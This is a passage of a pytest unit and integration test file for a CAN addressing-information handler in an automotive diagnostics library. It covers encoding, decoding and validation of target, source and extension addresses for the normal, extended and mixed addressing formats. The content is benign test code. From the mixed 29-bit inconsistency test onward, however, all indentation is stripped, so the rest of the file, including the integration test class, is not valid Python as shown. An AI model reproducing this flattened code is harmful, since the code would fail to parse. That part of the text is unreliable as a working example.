        assert decoded_values[CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME] is None
        mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
                                                            ai_data_bytes=ai_data_bytes)

    @pytest.mark.parametrize("addressing_format", [CanAddressingFormat.MIXED_11BIT_ADDRESSING,
                                                   CanAddressingFormat.MIXED_29BIT_ADDRESSING])
    @pytest.mark.parametrize("ai_data_bytes", [[0x0A], (0xCF,)])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_data_bytes")
    def test_decode_ai_data_bytes__mixed(self, mock_validate_ai_data_bytes, addressing_format, ai_data_bytes):
        decoded_values = CanAddressingInformationHandler.decode_ai_data_bytes(addressing_format=addressing_format,
                                                                              ai_data_bytes=ai_data_bytes)
        assert isinstance(decoded_values, dict)
        assert set(decoded_values.keys()) == {CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME,
                                              CanAddressingInformationHandler.TARGET_ADDRESS_NAME}
        assert decoded_values[CanAddressingInformationHandler.TARGET_ADDRESS_NAME] is None
        assert decoded_values[CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME] == ai_data_bytes[0]
        mock_validate_ai_data_bytes.assert_called_once_with(addressing_format=addressing_format,
                                                            ai_data_bytes=ai_data_bytes)

    # encode_ai_data_bytes

    @pytest.mark.parametrize("addressing_format", [CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
                                                   CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
    @pytest.mark.parametrize("target_address, address_extension", [
        (None, None),
        (0x5B, 0x9E),
    ])
    def test_generate_ai_data_bytes__normal(self, addressing_format, target_address, address_extension):
        assert CanAddressingInformationHandler.encode_ai_data_bytes(addressing_format=addressing_format,
                                                                    address_extension=address_extension,
                                                                    target_address=target_address) == []
        self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
        self.mock_validate_raw_byte.assert_not_called()

    @pytest.mark.parametrize("target_address, address_extension", [
        (None, None),
        (0x5B, 0x9E),
    ])
    def test_generate_ai_data_bytes__extended(self, target_address, address_extension):
        assert CanAddressingInformationHandler.encode_ai_data_bytes(
            addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
            address_extension=address_extension,
            target_address=target_address) == [target_address]
        self.mock_validate_addressing_format.assert_called_once_with(CanAddressingFormat.EXTENDED_ADDRESSING)
        self.mock_validate_raw_byte.assert_called_once_with(target_address)

    @pytest.mark.parametrize("addressing_format", [CanAddressingFormat.MIXED_11BIT_ADDRESSING,
                                                   CanAddressingFormat.MIXED_29BIT_ADDRESSING])
    @pytest.mark.parametrize("target_address, address_extension", [
        (None, None),
        (0x5B, 0x9E),
    ])
    def test_generate_ai_data_bytes__mixed(self, addressing_format, target_address, address_extension):
        assert CanAddressingInformationHandler.encode_ai_data_bytes(
            addressing_format=addressing_format,
            address_extension=address_extension,
            target_address=target_address) == [address_extension]
        self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
        self.mock_validate_raw_byte.assert_called_once_with(address_extension)

    @pytest.mark.parametrize("addressing_format", [None, "something else"])
    @pytest.mark.parametrize("target_address, address_extension", [
        (None, None),
        (0x5B, 0x9E),
    ])
    def test_generate_ai_data_bytes__unknown(self, addressing_format, target_address, address_extension):
        with pytest.raises(NotImplementedError):
            CanAddressingInformationHandler.encode_ai_data_bytes(addressing_format=addressing_format,
                                                                 address_extension=address_extension,
                                                                 target_address=target_address)
        self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
        self.mock_validate_raw_byte.assert_not_called()

    # get_ai_data_bytes_number

    def test_get_ai_data_bytes_number(self, example_can_addressing_format):
        value = CanAddressingInformationHandler.get_ai_data_bytes_number(example_can_addressing_format)
        assert isinstance(value, int)
        assert value >= 0
        self.mock_validate_addressing_format.assert_called_once_with(example_can_addressing_format)

    # validate_ai

    @pytest.mark.parametrize("addressing_format", [None, "unknown addressing format"])
    @pytest.mark.parametrize("addressing_type, can_id, target_address, source_address, address_extension", [
        ("some addressing", "some CAN ID", "TA", "SA", "AE"),
        (AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B, 0xF1),
    ])
    def test_validate_ai__unknown_addressing_format(self, addressing_format, addressing_type, can_id,
                                                    target_address, source_address, address_extension):
        with pytest.raises(NotImplementedError):
            CanAddressingInformationHandler.validate_ai(addressing_format=addressing_format,
                                                        addressing_type=addressing_type,
                                                        can_id=can_id,
                                                        target_address=target_address,
                                                        source_address=source_address,
                                                        address_extension=address_extension)
        self.mock_validate_addressing_format.assert_called_once_with(addressing_format)

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing", "some CAN ID"),
        (AddressingType.PHYSICAL, 0x8213),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_11bit")
    def test_validate_ai__normal_11bit__valid(self, mock_validate_ai_normal_11bit,
                                              addressing_type, can_id):
        CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
                                                    addressing_type=addressing_type,
                                                    can_id=can_id)
        mock_validate_ai_normal_11bit.assert_called_once_with(addressing_type=addressing_type,
                                                              can_id=can_id)

    @pytest.mark.parametrize("addressing_type, can_id, target_address, source_address, address_extension", [
        ("some addressing", "some CAN ID", "TA", "SA", "AE"),
        ("some addressing", "some CAN ID", "TA", None, None),
        (AddressingType.PHYSICAL, 0x8213, None, None, 0xF1),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_11bit")
    def test_validate_ai__normal_11bit__invalid(self, mock_validate_ai_normal_11bit,
                                                addressing_type, can_id,
                                                target_address, source_address, address_extension):
        with pytest.raises(UnusedArgumentError):
            CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_11BIT_ADDRESSING,
                                                        addressing_type=addressing_type,
                                                        can_id=can_id,
                                                        target_address=target_address,
                                                        source_address=source_address,
                                                        address_extension=address_extension)
        mock_validate_ai_normal_11bit.assert_not_called()

    @pytest.mark.parametrize("addressing_type, can_id, target_address, source_address", [
        ("some addressing", "some CAN ID", "TA", "SA"),
        (AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_fixed")
    def test_validate_ai__normal_fixed__valid(self, mock_validate_ai_normal_fixed,
                                              addressing_type, can_id, target_address, source_address):
        CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
                                                    addressing_type=addressing_type,
                                                    can_id=can_id,
                                                    target_address=target_address,
                                                    source_address=source_address)
        mock_validate_ai_normal_fixed.assert_called_once_with(addressing_type=addressing_type,
                                                              can_id=can_id,
                                                              target_address=target_address,
                                                              source_address=source_address)

    @pytest.mark.parametrize("addressing_type, can_id, target_address, source_address", [
        ("some addressing", "some CAN ID", "TA", "SA"),
        (AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B),
    ])
    @pytest.mark.parametrize("address_extension", ["AE", 0x9B, 1])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_normal_fixed")
    def test_validate_ai__normal_fixed__invalid(self, mock_validate_ai_normal_fixed,
                                                addressing_type, can_id,
                                                target_address, source_address, address_extension):
        with pytest.raises(UnusedArgumentError):
            CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.NORMAL_FIXED_ADDRESSING,
                                                        addressing_type=addressing_type,
                                                        can_id=can_id,
                                                        target_address=target_address,
                                                        source_address=source_address,
                                                        address_extension=address_extension)
        mock_validate_ai_normal_fixed.assert_not_called()

    @pytest.mark.parametrize("addressing_type, can_id, target_address", [
        ("some addressing", "some CAN ID", "TA"),
        (AddressingType.PHYSICAL, 0x8213, 0x9A),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_extended")
    def test_validate_ai__extended__valid(self, mock_validate_ai_extended,
                                          addressing_type, can_id, target_address):
        CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
                                                    addressing_type=addressing_type,
                                                    can_id=can_id,
                                                    target_address=target_address)
        mock_validate_ai_extended.assert_called_once_with(addressing_type=addressing_type,
                                                          can_id=can_id,
                                                          target_address=target_address)

    @pytest.mark.parametrize("addressing_type, can_id, target_address", [
        ("some addressing", "some CAN ID", "TA"),
        (AddressingType.PHYSICAL, 0x8213, 0x9A),
    ])
    @pytest.mark.parametrize("source_address, address_extension", [
        ("SA", "AE"),
        ("SA", None),
        (None, "AE"),
        (0x0B, 0xF1),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_extended")
    def test_validate_ai__extended__invalid(self, mock_validate_ai_extended,
                                            addressing_type, can_id,
                                            target_address, source_address, address_extension):
        with pytest.raises(UnusedArgumentError):
            CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.EXTENDED_ADDRESSING,
                                                        addressing_type=addressing_type,
                                                        can_id=can_id,
                                                        target_address=target_address,
                                                        source_address=source_address,
                                                        address_extension=address_extension)
        mock_validate_ai_extended.assert_not_called()

    @pytest.mark.parametrize("addressing_type, can_id, address_extension", [
        ("some addressing", "some CAN ID", "AE"),
        (AddressingType.PHYSICAL, 0x8213, 0xF1),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_mixed_11bit")
    def test_validate_ai__mixed_11bit__valid(self, mock_validate_ai_mixed_11bit,
                                             addressing_type, can_id, address_extension):
        CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.MIXED_11BIT_ADDRESSING,
                                                    addressing_type=addressing_type,
                                                    can_id=can_id,
                                                    address_extension=address_extension)
        mock_validate_ai_mixed_11bit.assert_called_once_with(addressing_type=addressing_type,
                                                             can_id=can_id,
                                                             address_extension=address_extension)

    @pytest.mark.parametrize("addressing_type, can_id, address_extension", [
        ("some addressing", "some CAN ID", "AE"),
        (AddressingType.PHYSICAL, 0x8213, 0xF1),
    ])
    @pytest.mark.parametrize("target_address, source_address", [
        ("TA", "SA"),
        ("TA", None),
        (None, "SA"),
        (0x0B, 0xF1),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_mixed_11bit")
    def test_validate_ai__mixed_11bit__invalid(self, mock_validate_ai_mixed_11bit,
                                               addressing_type, can_id,
                                               target_address, source_address, address_extension):
        with pytest.raises(UnusedArgumentError):
            CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.MIXED_11BIT_ADDRESSING,
                                                        addressing_type=addressing_type,
                                                        can_id=can_id,
                                                        target_address=target_address,
                                                        source_address=source_address,
                                                        address_extension=address_extension)
        mock_validate_ai_mixed_11bit.assert_not_called()

    @pytest.mark.parametrize("addressing_type, can_id, target_address, source_address, address_extension", [
        ("some addressing", "some CAN ID", "TA", "SA", "AE"),
        (0, None, None, None, None),
        (AddressingType.PHYSICAL, 0x8213, 0x9A, 0x0B, 0xF1),
    ])
    @patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.validate_ai_mixed_29bit")
    def test_validate_ai__mixed_29bit(self, mock_validate_ai_mixed_29bit,
                                      addressing_type, can_id,
                                      target_address, source_address, address_extension):
        CanAddressingInformationHandler.validate_ai(addressing_format=CanAddressingFormat.MIXED_29BIT_ADDRESSING,
                                                    addressing_type=addressing_type,
                                                    can_id=can_id,
                                                    target_address=target_address,
                                                    source_address=source_address,
                                                    address_extension=address_extension)
        mock_validate_ai_mixed_29bit.assert_called_once_with(addressing_type=addressing_type,
                                                             can_id=can_id,
                                                             target_address=target_address,
                                                             source_address=source_address,
                                                             address_extension=address_extension)

    # validate_ai_normal_11bit

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing type", "some id"),
        (AddressingType.PHYSICAL, 0x7FF),
    ])
    def test_validate_ai_normal_11bit__invalid_can_id(self, addressing_type, can_id):
        self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.return_value = False
        with pytest.raises(InconsistentArgumentsError):
            CanAddressingInformationHandler.validate_ai_normal_11bit(addressing_type=addressing_type,
                                                                     can_id=can_id)
        self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
        self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.assert_called_once_with(can_id)

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing type", "some id"),
        (AddressingType.PHYSICAL, 0x7FF),
    ])
    def test_validate_ai_normal_11bit__valid(self, addressing_type, can_id):
        self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.return_value = True
        CanAddressingInformationHandler.validate_ai_normal_11bit(addressing_type=addressing_type,
                                                                 can_id=can_id)
        self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
        self.mock_can_id_handler_class.is_normal_11bit_addressed_can_id.assert_called_once_with(can_id)
        self.mock_validate_addressing_type.assert_called_once_with(addressing_type)

    # validate_ai_normal_fixed

    @pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
    @pytest.mark.parametrize("can_id, target_address, source_address", [
        (None, None, 0),
        (None, 0x05, None),
        (None, None, None),
    ])
    def test_validate_ai_normal_fixed__missing_info(self, addressing_type, can_id,
                                                    target_address, source_address):
        self.mock_can_id_handler_class.is_normal_fixed_addressed_can_id.return_value = True
        with pytest.raises(InconsistentArgumentsError):
            CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
                                                                     can_id=can_id,
                                                                     target_address=target_address,
                                                                     source_address=source_address)

    @pytest.mark.parametrize("can_id", ["some CAN ID", 0x8FABC])
    @pytest.mark.parametrize("addressing_type, decoded_addressing_type, ta, decoded_ta, sa, decoded_sa", [
        (AddressingType.PHYSICAL, AddressingType.PHYSICAL, None, 0x55, 0x7F, 0x80),
        ("something", "something else", None, 0x55, None, 0x10),
        ("something", "something", 0x56, 0x55, None, 0x10),
        ("something", "something else", 0x56, 0x55, 0x7F, 0x10),
    ])
    def test_validate_ai_normal_fixed__inconsistent_can_id_ta_sa(self, can_id, addressing_type,
                                                                 decoded_addressing_type,
                                                                 ta, decoded_ta, sa, decoded_sa):
        self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.return_value = {
            self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: decoded_addressing_type,
            self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: decoded_ta,
            self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: decoded_sa,
        }
        with pytest.raises(InconsistentArgumentsError):
            CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
                                                                     can_id=can_id,
                                                                     target_address=ta,
                                                                     source_address=sa)
        self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.assert_called_once_with(can_id)

    @pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
    @pytest.mark.parametrize("target_address, source_address", [
        ("ta", "sa"),
        (0xFA, 0x55),
    ])
    def test_validate_ai_normal_fixed__valid_without_can_id(self, addressing_type, target_address, source_address):
        CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
                                                                 can_id=None,
                                                                 target_address=target_address,
                                                                 source_address=source_address)
        self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
        self.mock_validate_raw_byte.assert_has_calls([call(target_address), call(source_address)], any_order=True)
        self.mock_can_id_handler_class.validate_can_id.assert_not_called()
        self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.assert_not_called()

    @pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
    @pytest.mark.parametrize("can_id", ["some CAN ID", 0x85421])
    @pytest.mark.parametrize("target_address, source_address", [
        (None, None),
        (0x12, None),
        (None, 0x34),
        ("ta", "sa"),
    ])
    def test_validate_ai_normal_fixed__valid_with_can_id(self, addressing_type, can_id, target_address,
                                                         source_address):
        self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.return_value = {
            self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: addressing_type,
            self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: target_address or "ta",
            self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: source_address or "sa",
        }
        CanAddressingInformationHandler.validate_ai_normal_fixed(addressing_type=addressing_type,
                                                                 can_id=can_id,
                                                                 target_address=target_address,
                                                                 source_address=source_address)
        self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
        self.mock_validate_raw_byte.assert_not_called()
        self.mock_can_id_handler_class.decode_normal_fixed_addressed_can_id.assert_called_once_with(can_id)

    # validate_ai_extended

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing type", "some id"),
        (AddressingType.PHYSICAL, 0x7FF),
    ])
    @pytest.mark.parametrize("target_address", ["some TA", 0x5B])
    def test_validate_ai_extended__invalid_can_id(self, addressing_type, can_id, target_address):
        self.mock_can_id_handler_class.is_extended_addressed_can_id.return_value = False
        with pytest.raises(InconsistentArgumentsError):
            CanAddressingInformationHandler.validate_ai_extended(addressing_type=addressing_type,
                                                                 can_id=can_id,
                                                                 target_address=target_address)
        self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
        self.mock_can_id_handler_class.is_extended_addressed_can_id.assert_called_once_with(can_id)

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing type", "some id"),
        (AddressingType.PHYSICAL, 0x7FF),
    ])
    @pytest.mark.parametrize("target_address", ["some TA", 0x5B])
    def test_validate_ai_extended__valid(self, addressing_type, can_id, target_address):
        self.mock_can_id_handler_class.is_extended_addressed_can_id.return_value = True
        CanAddressingInformationHandler.validate_ai_extended(addressing_type=addressing_type,
                                                             can_id=can_id,
                                                             target_address=target_address)
        self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
        self.mock_can_id_handler_class.is_extended_addressed_can_id.assert_called_once_with(can_id)
        self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
        self.mock_validate_raw_byte.assert_called_once_with(target_address)

    # validate_ai_mixed_11bit

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing type", "some id"),
        (AddressingType.PHYSICAL, 0x7FF),
    ])
    @pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
    def test_validate_ai_mixed_11bit__invalid_can_id(self, addressing_type, can_id, address_extension):
        self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.return_value = False
        with pytest.raises(InconsistentArgumentsError):
            CanAddressingInformationHandler.validate_ai_mixed_11bit(addressing_type=addressing_type,
                                                                    can_id=can_id,
                                                                    address_extension=address_extension)
        self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
        self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.assert_called_once_with(can_id)

    @pytest.mark.parametrize("addressing_type, can_id", [
        ("some addressing type", "some id"),
        (AddressingType.PHYSICAL, 0x7FF),
    ])
    @pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
    def test_validate_ai_mixed_11bit__valid(self, addressing_type, can_id, address_extension):
        self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.return_value = True
        CanAddressingInformationHandler.validate_ai_mixed_11bit(addressing_type=addressing_type,
                                                                can_id=can_id,
                                                                address_extension=address_extension)
        self.mock_can_id_handler_class.validate_can_id.assert_called_once_with(can_id)
        self.mock_can_id_handler_class.is_mixed_11bit_addressed_can_id.assert_called_once_with(can_id)
        self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
        self.mock_validate_raw_byte.assert_called_once_with(address_extension)

    # validate_ai_mixed_29bit

    @pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
    @pytest.mark.parametrize("can_id, target_address, source_address", [
        (None, None, 0),
        (None, 0x05, None),
        (None, None, None),
    ])
    @pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
    def test_validate_ai_mixed_29bit__missing_info(self, addressing_type, can_id,
                                                   target_address, source_address, address_extension):
        self.mock_can_id_handler_class.is_mixed_29bit_addressed_can_id.return_value = True
        with pytest.raises(InconsistentArgumentsError):
            CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
                                                                    can_id=can_id,
                                                                    target_address=target_address,
                                                                    source_address=source_address,
                                                                    address_extension=address_extension)
@pytest.mark.parametrize("can_id", ["some CAN ID", 0x8FABC])
@pytest.mark.parametrize("addressing_type, decoded_addressing_type, ta, decoded_ta, sa, decoded_sa", [
(AddressingType.PHYSICAL, AddressingType.PHYSICAL, None, 0x55, 0x7F, 0x80),
("something", "something else", None, 0x55, None, 0x10),
("something", "something", 0x56, 0x55, None, 0x10),
("something", "something else", 0x56, 0x55, 0x7F, 0x10),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__inconsistent_can_id_ta_sa(self, can_id, addressing_type, decoded_addressing_type,
ta, decoded_ta, sa, decoded_sa, address_extension):
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.return_value = {
self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: decoded_addressing_type,
self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: decoded_ta,
self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: decoded_sa,
}
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=can_id,
target_address=ta,
source_address=sa,
address_extension=address_extension)
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.assert_called_once_with(can_id)
@pytest.mark.parametrize("addressing_type", ["some addressing type", AddressingType.PHYSICAL])
@pytest.mark.parametrize("target_address, source_address", [
("ta", "sa"),
(0, 0),
(0xFA, 0x55),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__valid_without_can_id(self, addressing_type,
target_address, source_address, address_extension):
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=None,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_has_calls([call(target_address), call(source_address),
call(address_extension)], any_order=True)
self.mock_can_id_handler_class.validate_can_id.assert_not_called()
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.assert_not_called()
@pytest.mark.parametrize("can_id", ["some CAN ID", 0x85421])
@pytest.mark.parametrize("target_address, source_address, addressing_type", [
(None, None, "XD"),
(0x12, None, AddressingType.FUNCTIONAL),
(None, 0x34, AddressingType.PHYSICAL),
("ta", "sa", "some addressing type"),
])
@pytest.mark.parametrize("address_extension", ["some AE", 0x5B])
def test_validate_ai_mixed_29bit__valid_with_can_id(self, addressing_type, can_id,
target_address, source_address, address_extension):
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.return_value = {
self.mock_can_id_handler_class.ADDRESSING_TYPE_NAME: addressing_type,
self.mock_can_id_handler_class.TARGET_ADDRESS_NAME: target_address or "ta",
self.mock_can_id_handler_class.SOURCE_ADDRESS_NAME: source_address or "sa",
}
CanAddressingInformationHandler.validate_ai_mixed_29bit(addressing_type=addressing_type,
can_id=can_id,
target_address=target_address,
source_address=source_address,
address_extension=address_extension)
self.mock_validate_addressing_type.assert_called_once_with(addressing_type)
self.mock_validate_raw_byte.assert_called_once_with(address_extension)
self.mock_can_id_handler_class.decode_mixed_addressed_29bit_can_id.assert_called_once_with(can_id)
# validate_ai_data_bytes
@pytest.mark.parametrize("addressing_format", ["Addressing Format", CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
@pytest.mark.parametrize("ai_data_bytes", [[], (0x12,), [0x9A, 0xD3]])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.get_ai_data_bytes_number")
def test_validate_ai_data_bytes__invalid(self, mock_get_ai_data_bytes_number, addressing_format, ai_data_bytes):
mock_get_ai_data_bytes_number.return_value = MagicMock(__eq__=Mock(return_value=False))
with pytest.raises(InconsistentArgumentsError):
CanAddressingInformationHandler.validate_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_bytes.assert_called_once_with(ai_data_bytes, allow_empty=True)
mock_get_ai_data_bytes_number.assert_called_once_with(addressing_format)
@pytest.mark.parametrize("addressing_format", ["Addressing Format", CanAddressingFormat.NORMAL_FIXED_ADDRESSING])
@pytest.mark.parametrize("ai_data_bytes", [[], (0x12,), [0x9A, 0xD3]])
@patch(f"{SCRIPT_LOCATION}.CanAddressingInformationHandler.get_ai_data_bytes_number")
def test_validate_ai_data_bytes__valid(self, mock_get_ai_data_bytes_number, addressing_format, ai_data_bytes):
mock_get_ai_data_bytes_number.return_value = len(ai_data_bytes)
CanAddressingInformationHandler.validate_ai_data_bytes(addressing_format=addressing_format,
ai_data_bytes=ai_data_bytes)
self.mock_validate_addressing_format.assert_called_once_with(addressing_format)
self.mock_validate_raw_bytes.assert_called_once_with(ai_data_bytes, allow_empty=True)
mock_get_ai_data_bytes_number.assert_called_once_with(addressing_format)
@pytest.mark.integration
class TestCanAddressingInformationHandlerIntegration:
EMPTY_AI_INFO = {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: None,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}
# decode_ai
@pytest.mark.parametrize("addressing_format, can_id, ai_data_bytes, expected_output", [
# Normal 11 bit
(CanAddressingFormat.NORMAL_11BIT_ADDRESSING, 0x620, [], EMPTY_AI_INFO),
# Normal Fixed
(CanAddressingFormat.NORMAL_FIXED_ADDRESSING, 0x18DA1234, [], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.PHYSICAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0x12,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0x34,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
(CanAddressingFormat.NORMAL_FIXED_ADDRESSING, 0x18DBB0C2, [], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.FUNCTIONAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xB0,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0xC2,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
# Extended
(CanAddressingFormat.EXTENDED_ADDRESSING, 0x645, [0xE3], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xE3,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
(CanAddressingFormat.EXTENDED_ADDRESSING, 0x1A654321, [0xFF], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xFF,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: None,
}),
# Mixed 11bit
(CanAddressingFormat.MIXED_11BIT_ADDRESSING, 0x7F3, [0x0B], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: None,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0x0B,
}),
(CanAddressingFormat.MIXED_11BIT_ADDRESSING, 0x60A, [0xD9], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: None,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: None,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: None,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0xD9,
}),
# Mixed 29bit
(CanAddressingFormat.MIXED_29BIT_ADDRESSING, 0x18CEE009, [0x9A], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.PHYSICAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xE0,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0x09,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0x9A,
}),
(CanAddressingFormat.MIXED_29BIT_ADDRESSING, 0x18CDE009, [0x9A], {
CanAddressingInformationHandler.ADDRESSING_TYPE_NAME: AddressingType.FUNCTIONAL,
CanAddressingInformationHandler.TARGET_ADDRESS_NAME: 0xE0,
CanAddressingInformationHandler.SOURCE_ADDRESS_NAME: 0x09,
CanAddressingInformationHandler.ADDRESS_EXTENSION_NAME: 0x9A,
}),
])
def test_decode_ai(self, addressing_format, can_id, ai_data_bytes, expected_output):
assert CanAddressingInformationHandler.decode_ai(addressing_format=addressing_format,
can_id=can_id,
ai_data_bytes=ai_data_bytes) == expected_output
# encode_ai_data_bytes
@pytest.mark.parametrize("addressing_format, target_address, address_extension", [
(CanAddressingFormat.NORMAL_11BIT_ADDRESSING, None, None),
(CanAddressingFormat.NORMAL_FIXED_ADDRESSING, 0xFF, None),
(CanAddressingFormat.EXTENDED_ADDRESSING, 0x8C, None),
(CanAddressingFormat.MIXED_11BIT_ADDRESSING, None, 0x08),
(CanAddressingFormat.MIXED_29BIT_ADDRESSING, 0x2F, 0xEA),
])
def test_encode_ai_data_bytes(self, addressing_format, target_address, address_extension):
ai_data_bytes = CanAddressingInformationHandler.encode_ai_data_bytes(addressing_format=addressing_format,
target_address=target_address,
address_extension=address_extension)
assert len(ai_data_bytes) == CanAddressingInformationHandler.get_ai_data_bytes_number(addressing_format)
